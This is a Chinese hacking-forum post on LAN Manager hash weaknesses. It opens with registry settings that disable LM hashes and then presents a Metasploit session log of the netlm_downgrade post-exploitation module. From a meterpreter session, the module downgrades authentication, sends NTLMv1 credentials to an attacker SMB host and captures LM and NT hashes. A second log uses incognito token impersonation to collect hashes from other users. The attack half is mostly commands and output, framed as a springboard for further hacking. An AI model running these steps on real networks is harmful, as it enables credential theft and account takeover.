切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
379 LMHASH: Windows 共享安全[复制链接]
发表于 2012-12-30 01:01:01 | 显示全部楼层 |!read_mode!

尽管Windows的大多数用户不需要LAN Manager的支持,微软还是在Windows NT和2000系统里缺省安装了LAN Manager口令散列。由于LAN Manager使用的加密机制比微软现在的方法脆弱,LAN Manager的口令能在很短的时间内被破解。
LAN Manager散列的主要脆弱性在于:

  • 长的口令被截成14个字符
  • 短的口令被填补空格变成14个字符
  • 3口令中所有的字符被转换成大写
  • 4口令被分割成两个7个字符的片断,像这样
Yaseng:妈妈说以后抓HASH不需要删除360杀毒了。。。。

事实上,这就意味着口令破解程序只要破解两个7个字符的口令,并且不用测试小写字符情况即可获得成功。另外,LAN Manager容易被侦听口令散列,侦听可以为攻击者提供用户的口令。Win2000引入了有趣的方法,14个字符的限制被增加到127个,但为了向后兼容仍然使用LAN Manger散列算法,这样,对于与NT相同类型的攻击,密码依旧很脆弱。而且,如果您的整个操作系统环境中有不支持密码长度超过14个字符的非Win2000客户端,您可能会被这种限制搞糊涂。

有两种方法可以用来防止LM散列的密码被破解。第一种方法是取消LAN Manger在整个网络的鉴定功能,使用NTLMv2。NTLMv2(NT LanManager version 2)的认证方法克服了LAN Manger的大部分脆弱性,使用了更强健的编码,并改进了认证的安全机制。

从Windows NT 4.0 SP4及以后的系统,包括Windows 2000,微软使得我们在网络上只使用NTLMv2成为可能。在Windows NT和2000中这个功能在注册表中的控制键是HKLM\System\CurrentControlSet\Control\LSA\LMCompatibilityLevel。如果你把它的值设置成3,工作站或服务器将只使用NTLMv2信任证书进行


认证。如果设置成5,任何域控制器将拒绝LM和NTLM的认证而只接受NTLMv2。简单的删除网络LanMan散列带来的问题是,在SAM或Active Directory中散列还会产生和存储。微软提供了一次性取消LanMan散列防止再生的方法。在Windows 2000上,找到下面注册键:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa,在注册表编辑器RegEdit的菜单中选择Edit,单击Add键,加入一个名为NoLMHash的键值。然后,退出注册表编辑器,重启计算机。下次用户改变口令时,计算机就不会再产生LanMan散列。如果这个键是在Windows 2000域控制器上产生的,LanMan散列就不会被生成并存储在Active Directory。在Windows XP中同样的功能可以通过设置键值来完成。在注册表HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa下建立一个名为“NoLMHash”的DWORD值,并将其键值改为1即可这样久不能进行pass the network hashes攻击


如图片把LMCompatibilityLevel设置成 2 :

如果没做过安全设置 那么如下图。。


默认LMHASH是关闭的,可以通过编辑注册表来开启LMHASH 一个MSF POST:

  1. msf  post(netlm_downgrade) > ifconfig eth0 | grep "inet addr"
  2. [*] exec: ifconfig eth0 | grep "inet addr"

  3.           inet addr:192.168.1.101  Bcast:192.168.1.255  Mask:255.255.255.0
  4. msf  post(netlm_downgrade) > sessions

  5. Active sessions
  6. ===============

  7.   Id  Type                   Information                   Connection
  8.   --  ----                   -----------                   ----------
  9.   1   meterpreter x86/win32  HOSTNAME\Accuvant @ MATRIX  192.168.1.101:443 -> 192.168.1.202:1075 (192.168.1.202)

  10. msf  post(netlm_downgrade) > show options

  11. Module options (post/windows/manage/netlm_downgrade):

  12.    Name     Current Setting  Required  Description
  13.    ----     ---------------  --------  -----------
  14.    SESSION                   yes       The session to run this module on.
  15.    SMBHOST                   yes       IP Address where SMB host is listening to capture hashes.

  16. msf  post(netlm_downgrade) > set session 1
  17. session => 1
  18. msf  post(netlm_downgrade) > set SMBHOST 192.168.1.101
  19. SMBHOST => 192.168.1.101
  20. msf  post(netlm_downgrade) > run

  21. [*] NetLM is Disabled: HKLM\SYSTEM\CurrentControlSet\Control\Lsa\lmcompatibilitylevel == 2
  22. [+] NetLM is Enabled:  HKLM\SYSTEM\CurrentControlSet\Control\Lsa\lmcompatibilitylevel == 0
  23. [*] Establishing SMB connection to 192.168.1.101
  24. [*] SMB Captured - 2012-11-28 21:35:50 -0600
  25. NTLMv1 Response Captured from 192.168.1.202:1076 - 192.168.1.202
  26. USER:Accuvant DOMAIN:MATRIX OS:Windows Server 2003 3790 Service Pack 2 LM:
  27. LMHASH:d012529369a7033eca0e9fd69a24d7e0c4d6f0bca5a75372
  28. NTHASH:beae9fddc1f736c120c1d1859feead5a3a7812c8e7b68c30

  29. [*] The SMBHOST should now have NetLM hashes
  30. [*] Cleanup Completed: HKLM\SYSTEM\CurrentControlSet\Control\Lsa\lmcompatibilitylevel == 2
  31. [*] Post module execution completed
  32. msf  post(netlm_downgrade) >
复制代码

下面你久能进行一列系的HACK行为。。如References 5Update :多个用户怎么办? 如下操作:
  1. meterpreter > use incognito
  2. Loading extension incognito...success.
  3. meterpreter > list_tokens -u

  4. Delegation Tokens Available
  5. ========================================
  6. NT AUTHORITY\LOCAL SERVICE
  7. NT AUTHORITY\NETWORK SERVICE
  8. NT AUTHORITY\SYSTEM
  9. WIN1\brk

  10. Impersonation Tokens Available
  11. ========================================
  12. NT AUTHORITY\ANONYMOUS LOGON
  13. meterpreter > impersonate_token WIN1\\brk
  14. [+] Delegation token available
  15. [+] Successfully impersonated user WIN1\brk
复制代码

这样就能获得不同用户的HASH

References
http://fuzzexp.org/one-stop-server-metasploit-crack-windows-password.html
http://www.fishnetsecurity.com/6labs/blog/post-exploitation-using-netntlm-downgrade-attacks
http://fuzzexp.org/domain-invasion-of-keimpx.html
http://www.pentestgeek.com/2012/11/30/netlm-downgrade-attacks-with-metasploit/



附件: 你需要登录才可以下载或查看附件。没有帐号?加入Team
操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2019-12-13 18:06

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部